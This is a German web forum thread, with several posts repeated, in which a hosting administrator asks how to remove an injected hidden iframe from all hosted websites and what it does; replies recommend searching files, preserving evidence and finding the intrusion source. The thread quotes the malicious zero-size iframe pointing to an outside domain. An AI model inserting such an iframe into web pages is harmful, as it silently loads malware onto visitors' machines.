Auf dem Webserver hat sich ein gefährlicher Code eingeschlichen
Hallo,
Auf unseren Webserver hat sich ein gefährlicher Code eingeschlichen
<iframe src=http://www.haola123123.com/hkeraone/hker.htm widht=0 height=0></iframe>
jetzt meine Frage
Wir hosten mehrer Website wie lösche ich dieses Iframe von allen Websiten die wir hosten in einen zug oder bleibt mir nichts anderes über als alle Websiten durchgehn und sie händisch rauslöschen?? hat da wer schon erfahren
frage zwei
kennt dieses iframe wer bzw. was für einen schaden richtet es an? bislang hab ich nicht wirklich was drüber gefunden
danke in voraus
mfg
Auf unseren Webserver hat sich ein gefährlicher Code eingeschlichen
<iframe src=http://www.haola123123.com/hkeraone/hker.htm widht=0 height=0></iframe>
jetzt meine Frage
Wir hosten mehrer Website wie lösche ich dieses Iframe von allen Websiten die wir hosten in einen zug oder bleibt mir nichts anderes über als alle Websiten durchgehn und sie händisch rauslöschen?? hat da wer schon erfahren
frage zwei
kennt dieses iframe wer bzw. was für einen schaden richtet es an? bislang hab ich nicht wirklich was drüber gefunden
danke in voraus
mfg
Bitte markiere auch die Kommentare, die zur Lösung des Beitrags beigetragen haben
Content-ID: 84312
Url: https://administrator.de/forum/auf-dem-webserver-hat-sich-ein-gefaehrlicher-code-eingeschlichen-84312.html
Ausgedruckt am: 25.12.2024 um 02:12 Uhr
7 Kommentare
Neuester Kommentar
Frage 3:
Was ist das für ein Webserver und 3b) wie ist er da drauf gekommen?
Entweder manuell mit Grep suchen oder mit Windows Boardsuche.
Nicht einfach löschen, sondern rausfinden, wie er auf dein System gekommen ist - das ist deine Aufgabe!
Was ist das für ein Webserver und 3b) wie ist er da drauf gekommen?
Entweder manuell mit Grep suchen oder mit Windows Boardsuche.
Nicht einfach löschen, sondern rausfinden, wie er auf dein System gekommen ist - das ist deine Aufgabe!
ich dachte es
gäbe eine einfachere lösung weils
eh immer der selbe code ist der zum entfernen
ist
viele grüße
gäbe eine einfachere lösung weils
eh immer der selbe code ist der zum entfernen
ist
viele grüße
Hi,
geh mit dem Explorer auf den Webroot und drücke [F3] suchen:
Nach dateien suchen, deren inhalt "widht=0 height=0></iframe>" ist und durch den ganzen Baum suchen lassen, die Fundstellen ansehen. Wenn "nur" hker.htm darunter ist - diese htm. Datei umbenennen, dann "passiert" nicht mehr viel. Wenn du Sie löscht, kannst du nicht mehr rausfinden, wer und wann die Datei raufgespielt hat.
Nun rausfinden, wann diese Datei auf dem Server gelandet ist und ganz genau nachforschen, was wer und wie diese Datei auf die Maschine gekommen ist.
Dann kannste die auch löschen.
Hi,
du liesst offensichtlich meine Postings nicht richtig?
Wenn du die Datei kopierst, wer hat die Datei erzeugt? Richtig du....
Von daher wird das dann mit dem Nachforschen unmöglich.
Ist es immer die gleiche Datei - die den Iframe ausmacht?
Auch auf die Gefahr, dass du möglicherweise auch diesen Post nicht verstehst unter:
http://www.inforapid.de/html/srdownload.htm
diesem Link gibts ein Such und Ersetz Werkzeug.
Auf jeden Fall vorher eine Datensicherung machen, wenigstens jetzt
Bevor du die Einbruchsquelle nicht gefunden hast, ist nicht sicher - oder doch, das der Kram ratzfatz wieder auf dem System landet.
du liesst offensichtlich meine Postings nicht richtig?
Wenn du die Datei kopierst, wer hat die Datei erzeugt? Richtig du....
Von daher wird das dann mit dem Nachforschen unmöglich.
Ist es immer die gleiche Datei - die den Iframe ausmacht?
Auch auf die Gefahr, dass du möglicherweise auch diesen Post nicht verstehst unter:
http://www.inforapid.de/html/srdownload.htm
diesem Link gibts ein Such und Ersetz Werkzeug.
Auf jeden Fall vorher eine Datensicherung machen, wenigstens jetzt
Bevor du die Einbruchsquelle nicht gefunden hast, ist nicht sicher - oder doch, das der Kram ratzfatz wieder auf dem System landet.